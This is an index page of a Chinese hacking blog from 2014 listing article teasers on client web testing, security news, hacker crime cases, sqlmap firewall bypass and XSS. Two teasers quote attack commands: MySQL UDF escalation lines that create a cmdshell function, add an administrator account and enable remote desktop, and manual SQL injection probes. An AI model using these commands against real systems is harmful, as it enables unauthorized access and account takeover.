• 户外物理渗透:终端机,客户端的web测试思路

    户外物理渗透:终端机,客户端的web测试思路
    现在的客户端界面越做越好看了,很多用到了web技术,轻便、界面炫、更新快,但是这样web的缺点也就出来了,就是不稳定,容易受用户等因素影响。 因为很多客户端web是内嵌的,内部通信,所以很多对安全的考虑就很少,漏洞亦较多。在此,我想跟大家分享一下客户端的web测试思路,让大家找到更多的高质量漏洞。 首先打开一个客户端界面,如腾讯的群介绍界面。 方法一:测试F5键...阅读全文
    作者:qxz_xp | 发布:2014年5月04日 | 分类:黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 微软发布补丁 IE超级漏洞有救了

    微软发布补丁 IE超级漏洞有救了
    4月末微软发布安全公告向用户披露了一个涉及全部版本IE浏览器的重大漏洞,而随后美国安全局更是建议暂时停用微软的浏览器产品,从而避免风险。 现在,或许是为了减少用户流失。微软已经迅速对该漏洞开出处方,帮助用户降低安全风险。 微软在编号2963983的安全通告中表示,此前发现的漏洞能够让黑客访问IE已删除或未被正确分配的内存区域,从而获得与当前活动用户账户相同的...阅读全文
    作者:qxz_xp | 发布:2014年5月01日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 黑客圈:支付账号随意改 不花钱竟能下订单

    黑客圈:支付账号随意改 不花钱竟能下订单
      2001年,一场持续了7天7夜的“中美黑客大战”让不熟悉网络世界的中国人都认识到一个全新群体——黑客。网络以难以想象的速度在中国快速普及,黑客们针对网络安全而展开的黑帽白帽大战从未停歇过,2013年,全球5.52亿人因为黑客攻击泄露身份资料,而在中国,1.64亿人因为网络犯罪受到侵害,人均损失224美元。   随着智能手机日益普及,1200万个针对智能手机的恶意链接随时...阅读全文
    作者:qxz_xp | 发布:2014年4月30日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 网吧黑客攻击无处不在 数据加密摒除后患

    网吧黑客攻击无处不在 数据加密摒除后患
      网吧在20世纪末出现在大众的视野中,当时,国内的计算机产业和互联网技术刚刚起步,大多数市民还未配有家庭电脑,或是电脑还未连接网络,网吧就为这样的人群提供了接触互联网的机会。可以说网吧为中国计算机网络的发展做出了相当大的贡献。   随着IT技术与互联网技术的发展,网吧也在变得越来越高端,越来越科技化,并且并没有因为计算机的普及与网络的覆盖而淘汰,...阅读全文
    作者:qxz_xp | 发布:2014年4月24日 | 分类:业界新闻, 黑客攻防 | 1条评论
    阅读全文

  • 网吧遭黑客攻击 网管玩“无间道”

    网吧遭黑客攻击 网管玩“无间道”
    网吧格调高大上,引来黑客攻击。   新开网吧常常断网,客人不满客流骤减,到底是什么情况?无奈,网管扮作客人四处蹲点查作案者。4月20日,蹲点网管发现两名男子进入网吧后不看电影不打游戏,而是打开QQ远程操作,查询网吧电脑IP。   报警后,警察调查才知,这两名网吧客人其中一人是隔壁某网吧的网管。“他们来收集网吧IP地址,然后让黑客攻击这些地址,导致我们电脑瘫...阅读全文
    作者:qxz_xp | 发布:2014年4月22日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 3DMatrix黑客帝国数字雨动态壁纸(Android版)

    3DMatrix黑客帝国数字雨动态壁纸(Android版)
    3D黑客帝国动态壁纸具有最酷最真实的黑客帝国字符雨效果。 它能够立即让你的手机屏幕充满未来感和科技感。 你想让你身边用iPhone的朋友嫉妒吗?赶快安装3D黑客帝国动态壁纸吧。 主要特性:最酷的黑客帝国字符雨效果O喷GL实现并高度优化酷炫火焰效果支持安装到SD卡完整的自定义选项。 下载地址:http://pan.baidu.com/s/1sjKNJmH 阅读全文
    作者:qxz_xp | 发布:2014年4月20日 | 分类:黑客工具, 黑客攻防 | 暂无评论
    阅读全文

  • 南京“黑客”黑走武汉一公司8万元

    南京“黑客”黑走武汉一公司8万元
      南京一“黑客”,利用买来的黑客软件盗取了武汉一家游戏充值卡公司8万元。事发后,随着黑客的落网,生产、销售黑客软件的周伟、吉海也随之暴露。可谁也没想到,编写这个黑客软件的高手吉海,他家境殷实,根本就不差钱,可是,当吉海以每月工资2万元的价格聘请他编写黑客软件时,他却答应了。他说:“这个钱赚得太容易了,我躺在床上花一个小时就能搞定。”   在QQ群里卖黑客...阅读全文
    作者:qxz_xp | 发布:2014年4月17日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • SQLmap简介以及防火墙绕过方法

    SQLmap简介以及防火墙绕过方法
    简介     许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全...阅读全文
    作者:qxz_xp | 发布:2014年4月16日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 浅谈新手寻找XSS时所存在的一些误区

    浅谈新手寻找XSS时所存在的一些误区
    1. 误区1: XSS,不是专门去“绕过”限制。 打个简单的比方,一个已经被层层把守的大门,面前荆棘无数,而你又单枪匹马的,怎么闯的进去? 这个时候你要意识到,走大门是不可能的。其实我们要突破的城防,有很多小门可以进去的,甚至不需要任何手段就可以直接走进去。我们为什么不走呢? XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,...阅读全文
    作者:qxz_xp | 发布:2014年4月12日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • mysql提权方法总结四则

    mysql提权方法总结四则
    一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’  select cmdshell(’net user iis_user /add’);  select cmdshell(’net localgroup administrators iis_user /add’);  select cmdshell(’regedit /s d:\web\3389.reg’);  drop function cmdshell;  select cmdshell(’netstat -an’); 二 ...阅读全文
    作者:qxz_xp | 发布:2014年4月06日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 手工注入命令总汇

    手工注入命令总汇
    1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  ;and (select count(*) from msysobjects)>0 access 6.猜数据库;and (select Co...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:菜鸟入门, 黑客攻防 | 1条评论
    阅读全文

  • 黑客发个短信就能从ATM机取钱

    黑客发个短信就能从ATM机取钱
          来自赛门铁克(Symantec)最新披露的消息,黑客能够通过发送短信从ATM机获取到现金——这是通过首先将恶意程序加载到ATM设备中实现的。在本周一的报道中,赛门铁克将2013年10月在墨西哥爆发的Ploutus恶意程序,通过CD-ROM和USB驱动器就非常轻易地将Ploutus上传到ATM设备中,罪犯要接入这些驱动器首先需要解锁,或者直接在ATM机器外部钻孔。    赛门铁克安全研究人员Dan...阅读全文
    作者:qxz_xp | 发布:2014年3月26日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文